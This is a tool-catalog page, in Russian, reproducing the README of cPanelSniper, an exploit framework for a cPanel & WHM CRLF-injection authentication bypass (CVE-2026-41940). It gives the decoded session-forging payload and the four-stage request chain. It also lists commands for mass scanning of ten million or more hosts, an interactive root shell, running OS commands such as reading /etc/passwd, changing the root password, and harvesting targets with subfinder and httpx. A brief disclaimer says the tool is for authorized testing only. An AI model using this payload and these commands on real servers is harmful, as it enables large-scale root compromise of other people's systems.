Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/44pie/cpsniper
Аутентификация и авторизацияСканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияТестирование на ПроникновениеКомандование и УправлениеRed Teaming
GitHub44pie/cpsniper

cpsniper

cPanelSniper STABLE — CVE-2026-41940, оптимизирован для 10M+ целей

Репозиторий
2214 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

cPanelSniper

cPanelSniper

Python CVE cPanel stdlib pipeline Author

CVE-2026-41940 — Обход аутентификации cPanel & WHM через CRLF-инъекцию в файл сессии
Цепочка эксплойта из 4 этапов · Интерактивная WHM-оболочка · СТАБИЛЬНО для 10M+ целей · Нулевое использование памяти · только stdlib


Обзор

cPanelSniper — это специализированный фреймворк для эксплуатации CVE-2026-41940, критической уязвимости обхода аутентификации, затрагивающей cPanel & WHM. Уязвимость позволяет неаутентифицированным удалённым атакующим получить root-доступ к WHM путём внедрения CRLF-последовательностей в файл сессии через HTTP-заголовок Authorization — без каких-либо действительных учётных данных.

  • Оценка CVSS: 10.0 (критическая)
  • Эксплуатация в дикой природе: подтверждена (апрель 2026)
  • Затронутые установки: ~70 миллионов доменов, работающих на cPanel & WHM
  • Без зависимостей: чистый Python stdlib — без pip, без requests, без внешних пакетов

Только для авторизованного тестирования на проникновение и программ bug bounty.


⚡ СТАБИЛЬНАЯ ВЕРСИЯ

Эта версия оптимизирована для сканирования 10 000 000+ целей с НУЛЕВЫМ использованием памяти.

Что было исправлено

ПроблемаОригинальная версияИсправленная версия
Использование памятиЗагружает все цели в ОЗУПотоковая обработка целей построчно (0 памяти)
10M целейOOM → Убит ❌Завершается успешно ✅
ВозобновлениеНе поддерживаетсяФлаг --resume
ПрогрессНет ETAETA в реальном времени + скорость + статистика
РезультатыСохраняются только в концеСохраняются каждые 60 с (настраивается)

Ключевые возможности

  • Потоковая архитектура — обработка 10M+ целей без загрузки в память
  • Ноль OOM-сбоев — даже с очень большими списками целей
  • Автовозобновление — продолжите с места остановки с помощью --resume
  • Прогресс в реальном времени — ETA, скорость сканирования, отслеживание ошибок
  • Периодическое сохранение — результаты автоматически сохраняются для предотвращения потери данных
  • Готовность к пайплайнам — бесшовная работа с subfinder, httpx, shodan

Как это работает

Корневая причина находится в Session.pm: функция saveSession() вызывает filter_sessiondata() после записи файла сессии на диск. Это означает, что CRLF-символы, встроенные в значение заголовка Authorization: Basic, записываются дословно в файл сессии, внедряя контролируемые атакующим поля до санитизации.

Нормальный поток:
  POST /login/ → filter_sessiondata() → запись сессии → проверка аутентификации

Уязвимый поток:
  POST /login/ → запись сессии (внедрена CRLF-нагрузка) → filter_sessiondata() → проверка аутентификации читает отравленный файл

CRLF-нагрузка

Значение Authorization: Basic декодируется в:

root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1

Эти поля записываются непосредственно в файл сессии на диске. При обратном чтении cPanel обрабатывает сессию как полностью аутентифицированную root-сессию.

Цепочка эксплойта из 4 этапов

┌─────────────────────────────────────────────────────────────┐
│  Этап 0 — Обнаружение канонического имени хоста             │
│  GET /openid_connect/cpanelid → 307 → реальное имя хоста    │
├─────────────────────────────────────────────────────────────┤
│  Этап 1 — Создание preauth-сессии                           │
│  POST /login/?login_only=1  (неверные учётные данные)       │
│  ← 401 + cookie whostmgrsession                             │
├─────────────────────────────────────────────────────────────┤
│  Этап 2 — CRLF-инъекция                                     │
│  GET / + Cookie: session + Authorization: Basic <нагрузка>  │
│  cpsrvd записывает CRLF-поля в файл сессии                  │
│  ← 307 Location: /cpsessXXXXXXXXXX/...                     │
├─────────────────────────────────────────────────────────────┤
│  Этап 3 — Распространение (гаджет do_token_denied)          │
│  GET /scripts2/listaccts                                    │
│  Триггер сброса raw→cache — внедрённые поля активируются    │
│  ← 401 Token denied (ожидаемо)                              │
├─────────────────────────────────────────────────────────────┤
│  Этап 4 — Проверка root-доступа к WHM                       │
│  GET /cpsessXXXXXXXXXX/json-api/version                     │
│  ← 200 {"version":"11.x.x.x","result":1}  = ВЗЛОМАН        │
└─────────────────────────────────────────────────────────────┘

Затронутые версии

ВеткаУязвимаяИсправленная
110.x≤ 11.110.0.9611.110.0.97
118.x≤ 11.118.0.6211.118.0.63
126.x≤ 11.126.0.5311.126.0.54
132.x≤ 11.132.0.2811.132.0.29
134.x≤ 11.134.0.1911.134.0.20
136.x≤ 11.136.0.411.136.0.5

Установка

git clone https://github.com/44pie/cpsniper
cd cpsniper
python3 cPanelSniper.py --help

Установка pip не требуется. Только чистый Python 3.8+ stdlib.


Использование

Базовое сканирование

# Одиночная цель — только сканирование
python3 cPanelSniper.py -u https://target.com:2087

# Одиночная цель — интерактивная оболочка после обхода
python3 cPanelSniper.py -u https://target.com:2087 --action shell

# Большой список целей — 10M+ целей (СТАБИЛЬНО)
python3 cPanelSniper.py -l targets.txt -t 50 -o results.json

# Возобновление прерванного сканирования
python3 cPanelSniper.py -l targets.txt -t 50 -o results.json --resume

Действия после эксплуатации

# Список всех учётных записей cPanel на сервере
python3 cPanelSniper.py -u https://target.com:2087 --action list

# Выполнение OS-команды
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "id;whoami;uname -a"
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "ls /home"
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "cat /etc/passwd"

# Получение информации о сервере (имя хоста, нагрузка, диск, MySQL host)
python3 cPanelSniper.py -u https://target.com:2087 --action info

# Получение версии cPanel
python3 cPanelSniper.py -u https://target.com:2087 --action version

# Смена пароля root
python3 cPanelSniper.py -u https://target.com:2087 --action passwd --passwd 'NewPass@2026!'

# Интерактивная WHM-оболочка
python3 cPanelSniper.py -u https://target.com:2087 --action shell

Пайплайны (СТАБИЛЬНО для больших списков)

# subfinder → httpx → сохранение в файл → сканирование 10M+ целей
subfinder -d target.com -silent | \
  httpx -silent -ports 2087,2086 -threads 50 > targets.txt
python3 cPanelSniper.py -l targets.txt -t 50 -o results.json
Скачать инструмент